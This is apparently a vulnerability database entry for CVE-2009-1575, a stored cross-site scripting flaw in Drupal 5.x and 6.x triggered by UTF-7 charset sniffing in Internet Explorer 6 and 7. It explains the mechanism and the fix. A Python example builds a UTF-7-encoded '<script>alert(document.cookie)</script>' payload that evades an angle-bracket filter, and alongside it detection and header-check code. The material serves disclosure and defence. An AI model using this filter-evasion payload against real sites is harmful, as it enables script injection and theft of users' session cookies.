CVE-2009-1575
Description
Cross-site scripting (XSS) vulnerability in Drupal 5.x before 5.17 and 6.x before 6.11, as used in vbDrupal before 5.17.0, allows remote attackers to inject arbitrary web script or HTML via crafted UTF-8 byte sequences before the Content-Type meta tag, which are treated as UTF-7 by Internet Explorer 6 and 7.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Cross-site scripting in Drupal 5.x and 6.x allows remote attackers to execute arbitrary script via crafted UTF-8 byte sequences that are interpreted as UTF-7 by Internet Explorer 6/7.
Vulnerability
A cross-site scripting (XSS) vulnerability exists in Drupal 5.x before 5.17 and Drupal 6.x before 6.11, and in vbDrupal before 5.17.0, which bundles the affected core [2]. It arises when user-supplied content containing particular byte sequences is output in the page before the `<meta http-equiv="Content-Type">` tag that declares the page's charset. Because that declaration has not yet been reached when Internet Explorer 6 and 7 examine the leading bytes, the browsers may guess the encoding and decode the content as UTF-7, in which ASCII shift sequences such as `+ADw-` stand for `<`; text that was harmless as UTF-8 then becomes live markup and script [2].
Exploitation
The attacker needs only the ability to submit content that the site renders, such as comments or nodes [2]. They craft a string that is valid UTF-8 (plain ASCII suffices) and contains no literal angle brackets, so ordinary markup filtering leaves it alone, but that decodes to `<script>` markup when read as UTF-7. The string must land in the page output before the charset meta tag [2]. When a victim using Internet Explorer 6 or 7 loads the page, the browser treats the bytes as UTF-7 and the attacker's script runs in the site's origin. No privilege beyond content submission is needed; on a site that accepts anonymous comments, no authentication at all is required [2].
Impact
Successful exploitation allows remote attackers to inject arbitrary web script or HTML into the site's origin, i.e. a stored cross-site scripting (XSS) attack [2]. Impact includes session hijacking, actions performed with the victim's privileges (an administrator viewing the page is the most valuable target), defacement, or redirection to malicious sites. Only victims browsing with Internet Explorer 6 or 7 are affected; the description names no other browser [2].
Mitigation
The vulnerability is fixed in Drupal 5.17 and 6.11, released on 29 April 2009 [2]; vbDrupal 5.17.0 carries the corresponding fix. Sites should upgrade. For those unable to upgrade, the Drupal security advisory provides a patch [2]. No other workarounds are documented in the advisory. Distribution packages were also updated (Debian DSA-1792 and the Fedora package announcements listed under References). As a general defence against charset-sniffing attacks of this kind, sending the charset in the HTTP Content-Type header (`Content-Type: text/html; charset=utf-8`) rather than only in a meta tag removes the browser's reason to guess; `curl -sI` against a site's pages shows whether the header carries one. This CVE is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog.
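The mechanism described in the Vulnerability and Exploitation sections, together with the header check suggested under Mitigation, as an added example (not Drupal's code and not part of the advisory): it hand-builds the UTF-7 shift sequences an attacker would submit, shows that the result is plain ASCII (hence valid UTF-8) with no literal angle brackets for a markup filter to catch, decodes it the way a browser that has settled on UTF-7 would, and then scans a constructed page for such runs appearing before the charset meta tag. The sample pages, the header dictionaries and all function names are assumptions made for this example; `utf7_shift` builds the runs by hand because Python's own `utf-7` codec leaves `<` and `>` unencoded.

```python
# Added example for CVE-2009-1575 (not Drupal's code). Sample pages and
# headers below are constructed for this example.
import base64
import re
from typing import Dict, List, Optional, Tuple

# Characters a markup filter strips or escapes; the attacker hides these
# inside UTF-7 base64 runs so the filter sees only harmless ASCII.
DANGEROUS = set("<>\"'&+")


def utf7_shift(text: str) -> str:
    """Encode text as one RFC 2152 base64 run: '+' + base64(UTF-16BE) + '-'.
    Built by hand: Python's 'utf-7' codec emits '<' and '>' literally
    (RFC 2152 "set O"), which is not what an attacker submits."""
    b64 = base64.b64encode(text.encode("utf-16-be")).decode("ascii")
    return "+" + b64.rstrip("=") + "-"


def utf7_obfuscate(fragment: str) -> str:
    """Rewrite only the dangerous characters of an HTML fragment as UTF-7
    runs; everything else stays literal, so the result is pure ASCII."""
    return "".join(utf7_shift(c) if c in DANGEROUS else c for c in fragment)


def naive_tag_filter(text: str) -> str:
    """A filter that only knows about literal angle brackets."""
    return text.replace("<", "&lt;").replace(">", "&gt;")


def decode_as_utf7(text: str) -> str:
    """What a browser that has decided the page is UTF-7 would render."""
    return text.encode("ascii").decode("utf-7")


UTF7_RUN = re.compile(r"\+[A-Za-z0-9+/]+-?")
META_CHARSET = re.compile(r"<meta[^>]+charset=\s*\"?([\w-]+)", re.IGNORECASE)


def header_charset(headers: Dict[str, str]) -> Optional[str]:
    """Charset declared at HTTP level. Declaring it here, not only in a
    <meta> tag, is what removes the browser's reason to guess."""
    m = re.search(r"charset=\s*\"?([\w-]+)", headers.get("Content-Type", ""), re.I)
    return m.group(1).lower() if m else None


def utf7_runs_before_meta(body: str) -> List[Tuple[str, str]]:
    """Detection: UTF-7 runs that appear before the <meta> charset
    declaration and decode to filter-sensitive characters."""
    meta = META_CHARSET.search(body)
    limit = meta.start() if meta else len(body)
    hits = []
    for m in UTF7_RUN.finditer(body, 0, limit):
        try:
            decoded = decode_as_utf7(m.group(0))
        except UnicodeError:
            continue
        if any(c in DANGEROUS for c in decoded):
            hits.append((m.group(0), decoded))
    return hits


def page_is_exposed(body: str, headers: Dict[str, str]) -> bool:
    """True when the charset is declared only in <meta> and suspicious
    runs precede it, the condition the advisory describes."""
    return header_charset(headers) is None and bool(utf7_runs_before_meta(body))


# Constructed payload: what the attacker posts as a node title or comment.
PAYLOAD = utf7_obfuscate("<script>alert(document.cookie)</script>")

# Constructed page in the shape the advisory describes: user-supplied text
# (a node title) is emitted before the <meta> charset tag, after passing
# through a filter that escapes literal angle brackets.
SAMPLE_PAGE = (
    "<html><head><title>" + naive_tag_filter(PAYLOAD) + "</title>\n"
    '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">\n'
    "</head><body></body></html>"
)
# Same content, but the charset declaration comes first.
SAFE_ORDER_PAGE = (
    "<html><head>\n"
    '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">\n'
    "<title>" + naive_tag_filter(PAYLOAD) + "</title></head><body></body></html>"
)
HEADERS_WEAK = {"Content-Type": "text/html"}                 # no charset
HEADERS_FIXED = {"Content-Type": "text/html; charset=utf-8"}  # charset sent

if __name__ == "__main__":
    print("payload as submitted:", PAYLOAD)
    print("decoded as UTF-7:    ", decode_as_utf7(PAYLOAD))
    for run, decoded in utf7_runs_before_meta(SAMPLE_PAGE):
        print(f"  run {run!r} decodes to {decoded!r} before the meta tag")
    print("exposed, charset only in meta:", page_is_exposed(SAMPLE_PAGE, HEADERS_WEAK))
    print("exposed, charset in header:   ", page_is_exposed(SAMPLE_PAGE, HEADERS_FIXED))
```

The detection function is deliberately narrow: it flags only runs that sit before the charset declaration and that decode to characters a filter would have rejected, so ordinary `+` signs in text (which UTF-7 would write as `+-`) do not trigger it. The header check is the one worth automating across a site, since a charset in the HTTP Content-Type header closes the guessing window regardless of where content appears in the page.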
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:a:drupal:drupal:5.0:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.0:beta1:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.0:beta2:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.0:rc1:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.0:rc2:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.1:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.10:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.11:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.12:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.13:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.14:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.15:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.16:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.1_rev1.1:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.2:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.3:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.4:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.5.:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.5:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.6:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.7:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.8:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:5.9:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:beta1:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:beta2:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:beta3:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:beta4:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:rc-1:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:rc-2:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:rc-3:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.0:rc-4:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.1:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.10:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.2:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.3:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.4:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.5:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.6:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.7:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.8:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6.9:*:*:*:*:*:*:*
- cpe:2.3:a:drupal:drupal:6:beta1:*:*:*:*:*:*
- (no CPE) range: 5.x < 5.17; 6.x < 6.11
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- drupal.org/node/449078 (NVD: Patch, Vendor Advisory)
- www.osvdb.org/54152 (NVD: Patch)
- www.vbdrupal.org/forum/showthread.php (NVD: Patch, Vendor Advisory)
- www.vupen.com/english/advisories/2009/1216 (NVD: Patch, Vendor Advisory)
- secunia.com/advisories/34948 (NVD: Vendor Advisory)
- secunia.com/advisories/34950 (NVD: Vendor Advisory)
- secunia.com/advisories/34980 (NVD)
- www.debian.org/security/2009/dsa-1792 (NVD)
- exchange.xforce.ibmcloud.com/vulnerabilities/50250 (NVD)
- www.redhat.com/archives/fedora-package-announce/2009-May/msg00108.html (NVD)
- www.redhat.com/archives/fedora-package-announce/2009-May/msg00133.html (NVD)
News mentions
No linked articles in our index yet.